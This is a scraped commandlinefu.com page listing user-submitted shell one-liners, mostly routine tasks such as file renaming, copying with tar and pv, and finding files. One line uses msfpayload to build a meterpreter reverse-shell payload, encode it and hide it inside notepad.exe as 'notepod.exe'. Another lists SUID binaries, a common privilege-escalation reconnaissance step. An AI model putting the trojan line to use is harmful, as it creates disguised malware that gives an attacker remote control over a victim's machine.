What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Get involved!

You can sign-in using OpenID credentials, or register a traditional username and password.

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Universal configuration monitoring and system of record for IT.

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for:



May 19, 2015 - A Look At The New Commandlinefu
I've put together a short writeup on what kind of newness you can expect from the next iteration of clfu. Check it out here.
March 2, 2015 - New Management
I'm Jon, I'll be maintaining and improving clfu. Thanks to David for building such a great resource!

Top Tags





Maintained by Jon H.

Site originally by David Winterbottom (user root).

Psst. Open beta.

Wow, didn't really expect you to read this far down. The latest iteration of the site is in open beta. It's a gentle open beta-- not in prime-time just yet. It's being hosted over at UpGuard (link) and you are more than welcome to give it a shot. Couple things:

  • » The open beta is running a copy of the database that will not carry over to the final version. Don't post anything you don't mind losing.
  • » If you wish to use your user account, you will probably need to reset your password.
Your feedback is appreciated via the form on the beta page. Thanks! -Jon & CLFU Team

All commands from sorted by
Terminal - All commands - 12,388 results
cat search_items.txt | while read i; do surfraw google -browser=firefox $i; done
2011-05-12 09:27:08
User: bubo
Functions: cat read

tired of opening tabs and fill in search forms by hand? just pipe the search terms you need into this surfraw loop. you can use any browser you have installed, but a graphical browser with a tabbed interface will come in handy. surfraw can be found here:


wget --no-check-certificate https://code.google.com/p/msysgit/downloads/list -O - 2>nul | sed -n "0,/.*\(\/\/msysgit.googlecode.com\/files\/Git-.*\.exe\).*/s//http:\1/p" | wget -i - -O Git-Latest.exe
2012-11-14 08:17:50
User: michfield
Functions: sed wget
Tags: git windows wget

This command should be copy-pasted in Windows, but very similar one will work on Linux.

It uses wget and sed.

cd -
perl -e 'printf "%vd\n",pack "N",rand 256**4'
sshpass -p 't@uyM59bQ' ssh username@server.example.com
2012-02-13 09:51:41
User: djyoda
Functions: ssh

You can use sshpass command to provide password for ssh based login. sshpass is a utility designed for running ssh using the mode referred to as "keyboard-interactive" password authentication, but in non-interactive mode.

mkdir Epub ; mv -v --target-directory=Epub $(fgrep -lr epub *)
for f in $(ls *.xml.skippy); do mv $f `echo $f | sed 's|.skippy||'`; done
2009-11-19 21:36:26
User: argherna
Functions: ls mv sed
Tags: sed ls mv for

For this example, all files in the current directory that end in '.xml.skippy' will have the '.skippy' removed from their names.

exim -bV
VAR=$(head -5)
2014-04-05 13:45:18
User: rodolfoap
Functions: head
Tags: read stdin head,

Reads n lines from stdin and puts the contents in a variable. Yes, I know the read command and its options, but find this logical even for one line.

echo -n '#!'$(which awk)
awk '/^md/ {printf "%s: ", $1}; /blocks/ {print $NF}' </proc/mdstat
wget -k $URL
2010-08-21 17:39:53
User: minnmass
Functions: wget
Tags: wget

The "-k" flag will tell wget to convert links for local browsing; it works with mirroring (ie with "-r") or single-file downloads.

find . -exec grep "test" '{}' /dev/null \; -print
apt-cache search perl | grep module | awk '{print $1;}' | xargs sudo apt-get install -y

I used this to mass install a lot of perl stuff. Threw it together because I was feeling *especially* lazy. The 'perl' and the 'module' can be replaced with whatever you like.

find <dir> -printf '%p : %A@\n' | awk '{FS=" : " ; if($2 < <time in epoc> ) print $1 ;}' | xargs rm --verbose -fr ;
2009-11-20 16:31:58
User: angleto
Functions: awk find rm xargs

remove files with access time older than a given date.

If you want to remove files with a given modification time replace %A@ with %T@. Use %C@ for the modification time.

The time is expressed in epoc but is easy to use any other format.

dir='path to file'; tar cpf - "$dir" | pv -s $(du -sb "$dir" | awk '{print $1}') | tar xpf - -C /other/path
2010-01-19 19:05:45
User: starchox
Functions: awk dir du tar
Tags: copy tar cp

This may seem like a long command, but it is great for making sure all file permissions are kept in tact. What it is doing is streaming the files in a sub-shell and then untarring them in the target directory. Please note that the -z command should not be used for local files and no perfomance increase will be visible as overhead processing (CPU) will be evident, and will slow down the copy.

You also may keep simple with, but you don't have the progress info:

cp -rpf /some/directory /other/path
python -c "from uuid import UUID; print UUID('63b726a0-4c59-45e4-af65-bced5d268456').hex;"
2011-11-20 10:35:44
User: mackaz
Functions: python

Remove dashes, also validates if it's a valid UUID (in contrast to simple string-replacement)

find . -type f -exec grep -l "some string" {} \;
find -amin +[n] -delete
2009-11-20 17:15:28
User: TeacherTiger
Functions: find

Deletes files older than "n" minutes ago. Note the plus sign before the n is important and means "greater than n". This is more precise than atime, since atime is specified in units of days. NOTE that you can use amin/atime, mmin/mtime, and cmin/ctime for access, modification, and change times, respectively. Also, using -delete is faster than piping to xargs, since no piping is needed.

find -name "*.php" -exec php -l {} \; | grep -v "No syntax errors"
2010-07-23 08:09:47
User: ejrowley
Functions: find grep

If your site is struck with the white screen of death you can find the syntax error quickly with php lint

echo !$
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=8000 R | msfencode -c 5 -t exe -x ~/notepad.exe -k -o notepod.exe
find / -xdev \( -perm -4000 \) -type f -print0 | xargs -0 ls -l
jkhgkjh; until [[ $? -eq 0 ]]; do YOURCOMMAND; done
2014-04-11 08:19:15
User: moiefu

You want bash to keep running the command until it is successful (until the exit code is 0). Give a dummy command, which sets the exit code to 1 then keep running your command until it exits cleanly

acpi | cut -d '%' -f1 | cut -d ',' -f2